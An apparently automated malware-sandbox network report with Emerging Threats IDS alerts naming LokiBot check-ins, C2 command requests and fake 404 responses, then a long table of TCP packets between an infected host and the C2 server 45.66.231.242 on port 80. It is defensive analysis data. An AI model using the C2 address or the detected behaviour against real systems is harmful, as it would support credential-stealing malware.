              2024-10-01T10:56:53.939406+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983645.66.231.24280TCP
              2024-10-01T10:56:54.594825+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983645.66.231.24280TCP
              2024-10-01T10:56:54.594825+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983645.66.231.24280TCP
              2024-10-01T10:56:54.603050+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449836TCP
              2024-10-01T10:56:54.751235+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983745.66.231.24280TCP
              2024-10-01T10:56:54.751235+02002025381ET MALWARE LokiBot Checkin1192.168.2.44983745.66.231.24280TCP
              2024-10-01T10:56:54.751235+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983745.66.231.24280TCP
              2024-10-01T10:56:55.410095+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983745.66.231.24280TCP
              2024-10-01T10:56:55.410095+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983745.66.231.24280TCP
              2024-10-01T10:56:55.414906+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449837TCP
              2024-10-01T10:56:55.562073+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983845.66.231.24280TCP
              2024-10-01T10:56:55.562073+02002025381ET MALWARE LokiBot Checkin1192.168.2.44983845.66.231.24280TCP
              2024-10-01T10:56:55.562073+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983845.66.231.24280TCP
              2024-10-01T10:56:56.206844+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983845.66.231.24280TCP
              2024-10-01T10:56:56.206844+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983845.66.231.24280TCP
              2024-10-01T10:56:56.211771+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449838TCP
              2024-10-01T10:56:56.353977+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983945.66.231.24280TCP
              2024-10-01T10:56:56.353977+02002025381ET MALWARE LokiBot Checkin1192.168.2.44983945.66.231.24280TCP
              2024-10-01T10:56:56.353977+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983945.66.231.24280TCP
              2024-10-01T10:56:57.141032+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983945.66.231.24280TCP
              2024-10-01T10:56:57.141032+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983945.66.231.24280TCP
              2024-10-01T10:56:57.145919+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449839TCP
              2024-10-01T10:56:57.296632+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44984045.66.231.24280TCP
              2024-10-01T10:56:57.296632+02002025381ET MALWARE LokiBot Checkin1192.168.2.44984045.66.231.24280TCP
              2024-10-01T10:56:57.296632+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44984045.66.231.24280TCP
              2024-10-01T10:56:57.970989+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44984045.66.231.24280TCP
              2024-10-01T10:56:57.970989+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44984045.66.231.24280TCP
              2024-10-01T10:56:57.976548+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449840TCP
              2024-10-01T10:56:58.123183+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44984145.66.231.24280TCP
              2024-10-01T10:56:58.123183+02002025381ET MALWARE LokiBot Checkin1192.168.2.44984145.66.231.24280TCP
              2024-10-01T10:56:58.123183+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44984145.66.231.24280TCP
              2024-10-01T10:56:58.804022+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44984145.66.231.24280TCP
              2024-10-01T10:56:58.804022+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44984145.66.231.24280TCP
              2024-10-01T10:56:58.809435+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449841TCP
              2024-10-01T10:56:59.239027+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44984245.66.231.24280TCP
              2024-10-01T10:56:59.239027+02002025381ET MALWARE LokiBot Checkin1192.168.2.44984245.66.231.24280TCP
              2024-10-01T10:56:59.239027+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44984245.66.231.24280TCP
              2024-10-01T10:57:00.074828+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44984245.66.231.24280TCP
              2024-10-01T10:57:00.074828+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44984245.66.231.24280TCP
              2024-10-01T10:57:00.079904+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449842TCP
              2024-10-01T10:57:00.235929+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44984345.66.231.24280TCP
              2024-10-01T10:57:00.235929+02002025381ET MALWARE LokiBot Checkin1192.168.2.44984345.66.231.24280TCP
              2024-10-01T10:57:00.235929+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44984345.66.231.24280TCP
              2024-10-01T10:57:01.013791+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44984345.66.231.24280TCP
              2024-10-01T10:57:01.013791+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44984345.66.231.24280TCP
              2024-10-01T10:57:01.018612+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449843TCP
              2024-10-01T10:57:01.169312+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44984445.66.231.24280TCP
              2024-10-01T10:57:01.169312+02002025381ET MALWARE LokiBot Checkin1192.168.2.44984445.66.231.24280TCP
              2024-10-01T10:57:01.169312+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44984445.66.231.24280TCP
              2024-10-01T10:57:01.960683+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44984445.66.231.24280TCP
              2024-10-01T10:57:01.960683+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44984445.66.231.24280TCP
              2024-10-01T10:57:01.965569+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449844TCP
              TimestampSource PortDest PortSource IPDest IP
              Oct 1, 2024 10:54:59.005137920 CEST4973080192.168.2.445.66.231.242
              Oct 1, 2024 10:54:59.010060072 CEST804973045.66.231.242192.168.2.4
              Oct 1, 2024 10:54:59.010134935 CEST4973080192.168.2.445.66.231.242
              Oct 1, 2024 10:54:59.012348890 CEST4973080192.168.2.445.66.231.242
              Oct 1, 2024 10:54:59.017193079 CEST804973045.66.231.242192.168.2.4
              Oct 1, 2024 10:54:59.017244101 CEST4973080192.168.2.445.66.231.242
              Oct 1, 2024 10:54:59.022166967 CEST804973045.66.231.242192.168.2.4
              Oct 1, 2024 10:54:59.840167046 CEST804973045.66.231.242192.168.2.4
              Oct 1, 2024 10:54:59.840212107 CEST804973045.66.231.242192.168.2.4
              Oct 1, 2024 10:54:59.840322018 CEST4973080192.168.2.445.66.231.242
              Oct 1, 2024 10:54:59.840429068 CEST4973080192.168.2.445.66.231.242
              Oct 1, 2024 10:54:59.845195055 CEST804973045.66.231.242192.168.2.4
              Oct 1, 2024 10:54:59.996149063 CEST4973180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:00.004812956 CEST804973145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:00.004878044 CEST4973180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:00.007311106 CEST4973180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:00.012356997 CEST804973145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:00.012404919 CEST4973180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:00.017273903 CEST804973145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:00.929594994 CEST804973145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:00.929619074 CEST804973145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:00.929821014 CEST4973180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:00.929878950 CEST4973180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:00.934734106 CEST804973145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:00.999649048 CEST4973280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:01.004858017 CEST804973245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:01.004925013 CEST4973280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:01.007904053 CEST4973280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:01.012833118 CEST804973245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:01.012877941 CEST4973280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:01.017651081 CEST804973245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:01.753258944 CEST804973245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:01.753381968 CEST804973245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:01.753407955 CEST4973280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:01.753448963 CEST4973280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:01.758213997 CEST804973245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:01.917660952 CEST4973380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:01.922606945 CEST804973345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:01.922703981 CEST4973380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:01.924715042 CEST4973380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:01.929512978 CEST804973345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:01.929584026 CEST4973380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:01.934422970 CEST804973345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:02.665991068 CEST804973345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:02.666129112 CEST804973345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:02.666162968 CEST4973380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:02.666260958 CEST4973380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:02.671005011 CEST804973345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:02.827050924 CEST4973480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:02.831935883 CEST804973445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:02.832040071 CEST4973480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:02.833983898 CEST4973480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:02.838843107 CEST804973445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:02.838931084 CEST4973480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:02.843694925 CEST804973445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:03.554172993 CEST804973445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:03.554270983 CEST804973445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:03.554359913 CEST4973480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:03.554361105 CEST4973480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:03.560722113 CEST804973445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:03.723001003 CEST4973580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:03.727946997 CEST804973545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:03.728044987 CEST4973580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:03.730034113 CEST4973580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:03.734833956 CEST804973545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:03.734896898 CEST4973580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:03.739672899 CEST804973545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:04.620654106 CEST804973545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:04.620841026 CEST4973580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:04.620906115 CEST804973545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:04.620963097 CEST4973580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:04.625680923 CEST804973545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:04.779931068 CEST4973680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:04.784817934 CEST804973645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:04.784925938 CEST4973680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:04.786977053 CEST4973680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:04.791835070 CEST804973645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:04.791908979 CEST4973680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:04.796772957 CEST804973645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:05.540540934 CEST804973645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:05.540565968 CEST804973645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:05.540676117 CEST4973680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:05.540767908 CEST4973680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:05.545578003 CEST804973645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:05.701622963 CEST4973780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:05.706940889 CEST804973745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:05.707034111 CEST4973780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:05.709995985 CEST4973780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:05.714792967 CEST804973745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:05.714855909 CEST4973780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:05.719599009 CEST804973745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:06.533355951 CEST804973745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:06.533435106 CEST804973745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:06.533520937 CEST4973780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:06.533520937 CEST4973780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:06.538355112 CEST804973745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:06.677113056 CEST4973880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:06.682061911 CEST804973845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:06.682199001 CEST4973880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:06.685117960 CEST4973880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:06.689907074 CEST804973845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:06.689995050 CEST4973880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:06.694802999 CEST804973845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:10.377545118 CEST804973845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:10.377639055 CEST804973845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:10.377697945 CEST4973880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:10.377698898 CEST4973880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:10.382539034 CEST804973845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:10.527427912 CEST4973980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:10.532444954 CEST804973945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:10.532527924 CEST4973980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:10.534509897 CEST4973980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:10.539371967 CEST804973945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:10.539446115 CEST4973980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:10.544219971 CEST804973945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:11.258225918 CEST804973945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:11.258290052 CEST804973945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:11.258338928 CEST4973980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:11.258383989 CEST4973980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:11.263233900 CEST804973945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:11.414808989 CEST4974080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:11.421185970 CEST804974045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:11.421406984 CEST4974080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:11.424407005 CEST4974080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:11.431348085 CEST804974045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:11.431406975 CEST4974080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:11.438359976 CEST804974045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:12.104274988 CEST804974045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:12.104351997 CEST804974045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:12.104379892 CEST4974080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:12.104410887 CEST4974080192.168.2.445.66.231.242
              Oct 1, 2024 10:55:12.109160900 CEST804974045.66.231.242192.168.2.4
              Oct 1, 2024 10:55:12.278179884 CEST4974180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:12.283271074 CEST804974145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:12.283353090 CEST4974180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:12.286014080 CEST4974180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:12.290865898 CEST804974145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:12.290925980 CEST4974180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:12.295752048 CEST804974145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:12.998677969 CEST804974145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:12.998733997 CEST804974145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:12.998781919 CEST4974180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:12.998862028 CEST4974180192.168.2.445.66.231.242
              Oct 1, 2024 10:55:13.003679991 CEST804974145.66.231.242192.168.2.4
              Oct 1, 2024 10:55:13.143902063 CEST4974280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:13.149238110 CEST804974245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:13.149308920 CEST4974280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:13.151530981 CEST4974280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:13.156730890 CEST804974245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:13.156783104 CEST4974280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:13.161967993 CEST804974245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:13.904510975 CEST804974245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:13.904625893 CEST804974245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:13.904670954 CEST4974280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:13.904670954 CEST4974280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:13.909462929 CEST804974245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:14.047036886 CEST4974480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:14.051913023 CEST804974445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:14.052081108 CEST4974480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:14.054187059 CEST4974480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:14.058968067 CEST804974445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:14.059014082 CEST4974480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:14.063743114 CEST804974445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:14.895996094 CEST804974445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:14.896035910 CEST804974445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:14.896173954 CEST4974480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:14.897154093 CEST4974480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:14.902771950 CEST804974445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:15.168606043 CEST4974780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:15.173827887 CEST804974745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:15.173908949 CEST4974780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:15.176146984 CEST4974780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:15.181736946 CEST804974745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:15.181876898 CEST4974780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:15.186707973 CEST804974745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:15.839649916 CEST804974745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:15.839772940 CEST4974780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:15.839879036 CEST804974745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:15.839935064 CEST4974780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:15.845469952 CEST804974745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:15.989687920 CEST4974980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:15.994549990 CEST804974945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:15.994631052 CEST4974980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:15.996802092 CEST4974980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:16.001580000 CEST804974945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:16.001641035 CEST4974980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:16.006858110 CEST804974945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:16.898814917 CEST804974945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:16.898829937 CEST804974945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:16.898883104 CEST4974980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:16.898957968 CEST4974980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:16.904505968 CEST804974945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:17.045388937 CEST4975280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:17.050230980 CEST804975245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:17.050307989 CEST4975280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:17.052355051 CEST4975280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:17.057178974 CEST804975245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:17.057243109 CEST4975280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:17.062000990 CEST804975245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:20.761219025 CEST804975245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:20.761743069 CEST804975245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:20.761787891 CEST4975280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:20.761787891 CEST4975280192.168.2.445.66.231.242
              Oct 1, 2024 10:55:20.766593933 CEST804975245.66.231.242192.168.2.4
              Oct 1, 2024 10:55:20.923779964 CEST4975380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:20.928673029 CEST804975345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:20.928740025 CEST4975380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:20.931056023 CEST4975380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:20.935858965 CEST804975345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:20.935914040 CEST4975380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:20.940677881 CEST804975345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:21.654897928 CEST804975345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:21.654930115 CEST804975345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:21.655035973 CEST4975380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:21.655097961 CEST4975380192.168.2.445.66.231.242
              Oct 1, 2024 10:55:21.659847021 CEST804975345.66.231.242192.168.2.4
              Oct 1, 2024 10:55:21.796468973 CEST4975480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:21.801455021 CEST804975445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:21.801580906 CEST4975480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:21.803811073 CEST4975480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:21.808643103 CEST804975445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:21.808725119 CEST4975480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:21.813607931 CEST804975445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:22.549278021 CEST804975445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:22.549343109 CEST804975445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:22.549439907 CEST4975480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:22.549484015 CEST4975480192.168.2.445.66.231.242
              Oct 1, 2024 10:55:22.554282904 CEST804975445.66.231.242192.168.2.4
              Oct 1, 2024 10:55:22.688172102 CEST4975580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:22.693186045 CEST804975545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:22.693274021 CEST4975580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:22.695430994 CEST4975580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:22.700258017 CEST804975545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:22.700321913 CEST4975580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:22.705157995 CEST804975545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:23.470480919 CEST804975545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:23.470571995 CEST804975545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:23.470659971 CEST4975580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:23.470730066 CEST4975580192.168.2.445.66.231.242
              Oct 1, 2024 10:55:23.475666046 CEST804975545.66.231.242192.168.2.4
              Oct 1, 2024 10:55:23.609608889 CEST4975680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:23.614866018 CEST804975645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:23.614964962 CEST4975680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:23.617074013 CEST4975680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:23.621946096 CEST804975645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:23.622009993 CEST4975680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:23.627140999 CEST804975645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:24.551815987 CEST804975645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:24.551903009 CEST804975645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:24.552098036 CEST4975680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:24.552139997 CEST4975680192.168.2.445.66.231.242
              Oct 1, 2024 10:55:24.556972027 CEST804975645.66.231.242192.168.2.4
              Oct 1, 2024 10:55:24.703252077 CEST4975780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:24.708230019 CEST804975745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:24.708362103 CEST4975780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:24.711334944 CEST4975780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:24.716281891 CEST804975745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:24.716378927 CEST4975780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:24.721179962 CEST804975745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:25.375000954 CEST804975745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:25.375102043 CEST4975780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:25.375593901 CEST804975745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:25.375662088 CEST4975780192.168.2.445.66.231.242
              Oct 1, 2024 10:55:25.379993916 CEST804975745.66.231.242192.168.2.4
              Oct 1, 2024 10:55:25.522154093 CEST4975880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:25.527265072 CEST804975845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:25.527353048 CEST4975880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:25.529371977 CEST4975880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:25.534302950 CEST804975845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:25.534367085 CEST4975880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:25.539268017 CEST804975845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:26.195318937 CEST804975845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:26.195341110 CEST804975845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:26.195468903 CEST4975880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:26.195521116 CEST4975880192.168.2.445.66.231.242
              Oct 1, 2024 10:55:26.200290918 CEST804975845.66.231.242192.168.2.4
              Oct 1, 2024 10:55:26.348516941 CEST4975980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:26.353449106 CEST804975945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:26.353539944 CEST4975980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:26.356507063 CEST4975980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:26.361371040 CEST804975945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:26.361457109 CEST4975980192.168.2.445.66.231.242
              Oct 1, 2024 10:55:26.366272926 CEST804975945.66.231.242192.168.2.4
              Oct 1, 2024 10:55:27.085490942 CEST804975945.66.231.242192.168.2.4
